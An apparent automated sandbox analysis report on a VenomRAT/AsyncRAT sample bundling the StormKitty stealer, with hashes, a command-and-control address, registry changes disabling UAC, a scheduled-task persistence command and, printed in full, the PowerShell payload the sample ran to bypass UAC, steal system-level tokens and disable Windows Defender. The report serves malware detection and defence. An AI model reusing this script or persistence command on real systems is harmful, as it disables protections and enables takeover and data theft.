Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-12-2022 23:20
Static task
static1
Behavioral task
behavioral1
Sample
0ee108a8e3b9cddad2cceb2648072fe2.exe
Resource
win7-20220812-en
General
-
Target
0ee108a8e3b9cddad2cceb2648072fe2.exe
-
Size
415KB
-
MD5
0ee108a8e3b9cddad2cceb2648072fe2
-
SHA1
fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
-
SHA256
4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
-
SHA512
1456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
SSDEEP
12288:mF4ioOyjRGILz+N8vmI/v8GpRyWgDy6QG:2ZoOyjMqLN+W9G
Malware Config
Extracted
asyncrat
VenomRAT+HVNC+Stealer Version:5.0.8
Venom Clients
79.137.207.151:4449
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
10
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/552-82-0x0000000006FD0000-0x00000000070F2000-memory.dmp family_stormkitty -
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" svchost.exe -
Async RAT payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/288-57-0x0000000001F60000-0x0000000001F88000-memory.dmp asyncrat behavioral1/memory/288-58-0x00000000020B0000-0x00000000020D6000-memory.dmp asyncrat behavioral1/memory/552-75-0x00000000022C0000-0x00000000022CE000-memory.dmp asyncrat behavioral1/memory/552-80-0x0000000006740000-0x000000000674E000-memory.dmp asyncrat -
Executes dropped EXE 1 IoCs
Processes:
svchost.exepid process 552 svchost.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1724 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1096 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exepowershell.exepid process 288 0ee108a8e3b9cddad2cceb2648072fe2.exe 288 0ee108a8e3b9cddad2cceb2648072fe2.exe 288 0ee108a8e3b9cddad2cceb2648072fe2.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 1320 powershell.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe 552 svchost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exepowershell.exedescription pid process Token: SeDebugPrivilege 288 0ee108a8e3b9cddad2cceb2648072fe2.exe Token: SeDebugPrivilege 288 0ee108a8e3b9cddad2cceb2648072fe2.exe Token: SeDebugPrivilege 552 svchost.exe Token: SeDebugPrivilege 552 svchost.exe Token: SeDebugPrivilege 1320 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 552 svchost.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
0ee108a8e3b9cddad2cceb2648072fe2.execmd.execmd.exesvchost.exedescription pid process target process PID 288 wrote to memory of 1664 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1664 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1664 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1664 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1724 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1724 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1724 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 288 wrote to memory of 1724 288 0ee108a8e3b9cddad2cceb2648072fe2.exe cmd.exe PID 1664 wrote to memory of 1636 1664 cmd.exe schtasks.exe PID 1664 wrote to memory of 1636 1664 cmd.exe schtasks.exe PID 1664 wrote to memory of 1636 1664 cmd.exe schtasks.exe PID 1664 wrote to memory of 1636 1664 cmd.exe schtasks.exe PID 1724 wrote to memory of 1096 1724 cmd.exe timeout.exe PID 1724 wrote to memory of 1096 1724 cmd.exe timeout.exe PID 1724 wrote to memory of 1096 1724 cmd.exe timeout.exe PID 1724 wrote to memory of 1096 1724 cmd.exe timeout.exe PID 1724 wrote to memory of 552 1724 cmd.exe svchost.exe PID 1724 wrote to memory of 552 1724 cmd.exe svchost.exe PID 1724 wrote to memory of 552 1724 cmd.exe svchost.exe PID 1724 wrote to memory of 552 1724 cmd.exe svchost.exe PID 552 wrote to memory of 1320 552 svchost.exe powershell.exe PID 552 wrote to memory of 1320 552 svchost.exe powershell.exe PID 552 wrote to memory of 1320 552 svchost.exe powershell.exe PID 552 wrote to memory of 1320 552 svchost.exe powershell.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe"C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp178.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp178.tmp.batFilesize
150B
MD5bcb9228835228dc687bdc2559baa0718
SHA10b5d72c51949b19bb4bafa6d57d4a62e646e8de6
SHA25633ae8e17a10788b4e95eccc84291a974457451d4b2bc2f0263b9191e21e85631
SHA51297918cbce0fc2cfc2198d5244e1717228b323c6e5941a5a62a1be9cf57a10256a4be1b0fead5600198922df8f851319cdc3e889c27a7c084f7a25045643a64db
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
415KB
MD50ee108a8e3b9cddad2cceb2648072fe2
SHA1fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA2564672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA5121456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
415KB
MD50ee108a8e3b9cddad2cceb2648072fe2
SHA1fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA2564672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA5121456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
\Users\Admin\AppData\Roaming\svchost.exeFilesize
415KB
MD50ee108a8e3b9cddad2cceb2648072fe2
SHA1fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA2564672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA5121456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
-
memory/288-57-0x0000000001F60000-0x0000000001F88000-memory.dmpFilesize
160KB
-
memory/288-59-0x0000000075351000-0x0000000075353000-memory.dmpFilesize
8KB
-
memory/288-60-0x000000000027A000-0x00000000002A1000-memory.dmpFilesize
156KB
-
memory/288-54-0x000000000027A000-0x00000000002A1000-memory.dmpFilesize
156KB
-
memory/288-58-0x00000000020B0000-0x00000000020D6000-memory.dmpFilesize
152KB
-
memory/288-56-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/288-65-0x000000000027A000-0x00000000002A1000-memory.dmpFilesize
156KB
-
memory/288-67-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/288-55-0x0000000000470000-0x00000000004A5000-memory.dmpFilesize
212KB
-
memory/552-73-0x000000000053A000-0x0000000000561000-memory.dmpFilesize
156KB
-
memory/552-75-0x00000000022C0000-0x00000000022CE000-memory.dmpFilesize
56KB
-
memory/552-82-0x0000000006FD0000-0x00000000070F2000-memory.dmpFilesize
1.1MB
-
memory/552-81-0x00000000069D0000-0x00000000069D8000-memory.dmpFilesize
32KB
-
memory/552-70-0x0000000000000000-mapping.dmp
-
memory/552-80-0x0000000006740000-0x000000000674E000-memory.dmpFilesize
56KB
-
memory/552-74-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/1096-66-0x0000000000000000-mapping.dmp
-
memory/1320-76-0x0000000000000000-mapping.dmp
-
memory/1320-78-0x000000006EAE0000-0x000000006F08B000-memory.dmpFilesize
5.7MB
-
memory/1320-79-0x000000006EAE0000-0x000000006F08B000-memory.dmpFilesize
5.7MB
-
memory/1636-64-0x0000000000000000-mapping.dmp
-
memory/1664-61-0x0000000000000000-mapping.dmp
-
memory/1724-62-0x0000000000000000-mapping.dmp